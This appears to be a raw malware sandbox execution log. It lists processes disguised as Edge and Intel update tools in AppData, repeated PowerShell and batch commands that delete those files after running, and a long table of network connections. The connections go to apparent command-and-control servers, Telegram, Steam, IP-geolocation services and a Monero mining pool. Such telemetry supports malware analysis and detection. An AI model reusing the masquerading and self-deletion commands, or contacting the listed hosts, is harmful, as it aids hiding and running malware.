"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp2684.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp2684.tmp.bat
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5792 -s 664
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.10.1
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.0.1
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.10.1
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.0.1
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.0.1
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.10.1
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.0.1
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.10.1
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.0.1
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.10.1
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.10.1
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.0.1
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.10.1
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.0.1
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.0.1
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.10.1
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.10.1
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.0.1
C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BWCUpdater.exe
"C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BWCUpdater.exe" "{\"BWCU\":{\"fileName\":\"BWCUpdater.exe\",\"version\":\"2.0.1.4\",\"downloadURL\":\"https://download.microsoft.com/download/a/b/9/ab92b51f-92ea-4d46-9d21-9446bd20eed8/Update/BWCU/2.0.1.4/BWCUpdater.exe\",\"startApp\":\"BWApp\",\"forcelaunch\":\"0\",\"isMajorUpdate\":\"1\",\"BWCI\":{\"fileName\":\"BWCStartMSI.exe\",\"downloadURL\":\"https://download.microsoft.com/download/a/b/9/ab92b51f-92ea-4d46-9d21-9446bd20eed8/Update/BWCI/2.0.1.4/BWCStartMSI.exe\"},\"Components\":{\"BWApp\":{\"fileName\":\"BingWallpaperApp.exe\",\"version\":\"2.0.1.4\",\"downloadURL\":\"https://download.microsoft.com/download/a/b/9/ab92b51f-92ea-4d46-9d21-9446bd20eed8/Update/BWApp/2.0.1.4/BingWallpaperApp.exe\"},\"VSCM\":{\"fileName\":\"BingVisualSearchContextMenu.dll\",\"version\":\"1.0.7.8\",\"isMoveToTempRequired\":\"1\",\"optional\":\"IsVSEnabled\",\"downloadURL32\":\"https://go.microsoft.com/fwlink/?linkid=2142132\",\"downloadURL64\":\"https://go.microsoft.com/fwlink/?linkid=2142305\"},\"VSBL\":{\"fileName\":\"BingVisualSearchLauncher.exe\",\"version\":\"1.0.7.8\",\"optional\":\"IsVSEnabled\",\"downloadURL\":\"https://go.microsoft.com/fwlink/?linkid=2142207\"}}},\"hpwpdownloadAPI\":\"https://go.microsoft.com/fwlink/?linkid=2151983\",\"switch\":\"\",\"hbInterval\":\"1\",\"notifyAppInstall\":\"1\",\"notifyDailyRefresh\":\"1\",\"showNotificationAll\":\"1\",\"showImageNotification\":\"1\",\"showRecommendations\":\"1\",\"enableExtension\":\"1\",\"ShareSwitch\":\"1\",\"BNPSignal\":{\"ScanInterval\":\"12\",\"SendSignalOnChange\":1,\"ScheduledSignalInterval\":\"3\",\"SupportedBrowsers\":\"000\",\"APISwitch\":1},\"MEReset\":{\"Delay\":3,\"Type\":{\"NewUsers\":1,\"ExistingUsers\":1}}}"
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.10.1
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.0.1
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.10.1
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.0.1
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.0.1
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.10.1
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.0.1
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.10.1
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.0.1
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.10.1
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.0.1
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.10.1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 151.101.66.49:443 | urlhaus.abuse.ch | tcp |
| NL | 85.31.47.154:80 | 85.31.47.154 | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| FR | 104.85.37.68:443 | steamcommunity.com | tcp |
| TH | 45.141.26.234:80 | 45.141.26.234 | tcp |
| FI | 37.27.43.98:443 | tcp | |
| AE | 62.60.226.24:80 | 62.60.226.24 | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| CN | 47.92.31.237:8088 | tcp | |
| FI | 37.27.43.98:443 | tcp | |
| TH | 45.141.26.234:7000 | tcp | |
| HK | 47.238.103.180:54322 | 47.238.103.180 | tcp |
| RU | 185.81.68.147:443 | 185.81.68.147 | tcp |
| US | 8.8.8.8:53 | navegacionseguracol24vip.org | udp |
| CO | 181.131.217.244:30203 | navegacionseguracol24vip.org | tcp |
| CN | 101.37.34.164:9000 | tcp | |
| RU | 185.81.68.147:1912 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| FR | 104.85.37.68:443 | steamcommunity.com | tcp |
| FI | 37.27.43.98:443 | tcp | |
| CO | 181.131.217.244:30203 | navegacionseguracol24vip.org | tcp |
| CO | 181.131.217.244:30203 | navegacionseguracol24vip.org | tcp |
| CO | 181.131.217.244:30203 | navegacionseguracol24vip.org | tcp |
| TH | 85.203.4.238:80 | 85.203.4.238 | tcp |
| CO | 181.131.217.244:30203 | navegacionseguracol24vip.org | tcp |
| FI | 37.27.43.98:443 | tcp | |
| RU | 176.122.27.90:9999 | 176.122.27.90 | tcp |
| CN | 101.37.34.164:9000 | tcp | |
| RU | 176.122.27.90:8888 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| FR | 104.85.37.68:443 | steamcommunity.com | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | download.emailorganizer.com | udp |
| NL | 190.2.142.115:80 | download.emailorganizer.com | tcp |
| US | 8.8.8.8:53 | bgteamtestapp.azurewebsites.net | udp |
| US | 52.173.134.115:80 | bgteamtestapp.azurewebsites.net | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| FR | 23.40.113.217:80 | www.microsoft.com | tcp |
| US | 8.8.8.8:53 | windriversfiles.imeitools.com | udp |
| CN | 221.231.39.69:80 | windriversfiles.imeitools.com | tcp |
| US | 8.8.8.8:53 | g.ceipmsn.com | udp |
| US | 20.41.62.11:80 | g.ceipmsn.com | tcp |
| US | 20.41.62.11:80 | g.ceipmsn.com | tcp |
| US | 148.163.102.170:4782 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| FR | 104.85.37.68:443 | steamcommunity.com | tcp |
| FI | 37.27.43.98:443 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| IE | 185.166.142.23:443 | bitbucket.org | tcp |
| US | 8.8.8.8:53 | bbuseruploads.s3.amazonaws.com | udp |
| US | 3.5.30.113:443 | bbuseruploads.s3.amazonaws.com | tcp |
| US | 148.163.102.170:4782 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| RU | 91.240.118.204:8000 | 91.240.118.204 | tcp |
| US | 8.8.8.8:53 | navegacionseguracol24vip.org | udp |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| CO | 181.131.217.244:30201 | navegacionseguracol24vip.org | tcp |
| RU | 94.198.55.181:4337 | tcp | |
| RU | 185.81.68.147:1912 | tcp | |
| US | 8.8.8.8:53 | geoplugin.net | udp |
| NL | 178.237.33.50:80 | geoplugin.net | tcp |
| US | 148.163.102.170:4782 | tcp | |
| DE | 212.113.107.84:80 | 212.113.107.84 | tcp |
| RU | 185.81.68.147:1912 | tcp | |
| FI | 37.27.43.98:443 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| US | 8.8.8.8:53 | pentestfiles.s3.amazonaws.com | udp |
| US | 52.217.81.36:80 | pentestfiles.s3.amazonaws.com | tcp |
| US | 148.163.102.170:4782 | tcp | |
| RU | 185.81.68.148:80 | 185.81.68.148 | tcp |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| US | 148.163.102.170:4782 | tcp | |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| US | 148.163.102.170:4782 | tcp | |
| RU | 185.81.68.148:80 | 185.81.68.148 | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| FR | 104.85.37.68:443 | steamcommunity.com | tcp |
| FI | 37.27.43.98:443 | tcp | |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| RU | 185.81.68.148:80 | 185.81.68.148 | tcp |
| RU | 185.81.68.147:1912 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 8.8.8.8:53 | status.mycompliancereports.com | udp |
| CA | 35.183.28.21:80 | status.mycompliancereports.com | tcp |
| RU | 185.81.68.148:80 | 185.81.68.148 | tcp |
| US | 8.8.8.8:53 | newstaticfreepoint24.ddns-ip.net | udp |
| RU | 185.215.113.36:80 | 185.215.113.36 | tcp |
| CO | 181.131.217.244:1842 | newstaticfreepoint24.ddns-ip.net | tcp |
| FR | 82.64.156.123:80 | tcp | |
| US | 8.8.8.8:53 | d2e5gvivzj4g90.cloudfront.net | udp |
| DE | 13.32.118.160:443 | d2e5gvivzj4g90.cloudfront.net | tcp |
| US | 148.163.102.170:4782 | tcp | |
| RU | 31.41.244.11:80 | 31.41.244.11 | tcp |
| US | 8.8.8.8:53 | home.sevjs17sr.top | udp |
| FR | 82.64.156.123:80 | tcp | |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| RU | 185.81.68.148:80 | 185.81.68.148 | tcp |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| US | 148.163.102.170:4782 | tcp | |
| RU | 31.41.244.12:80 | 31.41.244.12 | tcp |
| US | 8.8.8.8:53 | infect-crackle.cyou | udp |
| US | 8.8.8.8:53 | se-blurry.biz | udp |
| US | 148.163.102.170:4782 | tcp | |
| US | 8.8.8.8:53 | zinc-sneark.biz | udp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 8.8.8.8:53 | dwell-exclaim.biz | udp |
| US | 8.8.8.8:53 | formy-spill.biz | udp |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| FI | 37.27.43.98:443 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 8.8.8.8:53 | covery-mover.biz | udp |
| US | 8.8.8.8:53 | dare-curbys.biz | udp |
| CO | 181.131.217.244:1842 | newstaticfreepoint24.ddns-ip.net | tcp |
| FR | 82.64.156.123:80 | tcp | |
| US | 8.8.8.8:53 | print-vexer.biz | udp |
| US | 148.163.102.170:4782 | tcp | |
| US | 8.8.8.8:53 | impend-differ.biz | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| DE | 104.86.41.223:443 | steamcommunity.com | tcp |
| FR | 142.250.75.238:443 | drive.google.com | tcp |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| RU | 185.81.68.148:80 | 185.81.68.148 | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| FR | 142.250.179.67:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| FR | 142.250.179.67:80 | o.pki.goog | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| FR | 142.250.74.225:443 | drive.usercontent.google.com | tcp |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| RU | 185.81.68.148:80 | 185.81.68.148 | tcp |
| FR | 82.64.156.123:80 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | r11.o.lencr.org | udp |
| GB | 2.22.144.142:80 | r11.o.lencr.org | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 148.163.102.170:4782 | tcp | |
| US | 8.8.8.8:53 | google.com | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | drive-connect.cyou | udp |
| US | 172.67.139.78:443 | drive-connect.cyou | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| FR | 104.85.37.68:443 | steamcommunity.com | tcp |
| US | 154.216.18.132:6868 | tcp | |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| FI | 37.27.43.98:443 | tcp | |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | a1060630.xsph.ru | udp |
| RU | 141.8.192.138:80 | a1060630.xsph.ru | tcp |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| CO | 181.131.217.244:1842 | newstaticfreepoint24.ddns-ip.net | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 154.216.18.132:6868 | tcp | |
| FR | 142.250.75.238:443 | drive.google.com | tcp |
| FR | 142.250.74.225:443 | drive.usercontent.google.com | tcp |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 127.0.0.1:443 | tcp | |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| FR | 82.64.156.123:80 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 8.8.8.8:53 | xmr-eu2.nanopool.org | udp |
| NL | 51.15.61.114:10343 | xmr-eu2.nanopool.org | tcp |
| US | 148.163.102.170:4782 | tcp | |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| DE | 104.86.41.223:443 | steamcommunity.com | tcp |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| FI | 37.27.43.98:443 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| CO | 181.131.217.244:1842 | newstaticfreepoint24.ddns-ip.net | tcp |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:443 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:443 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
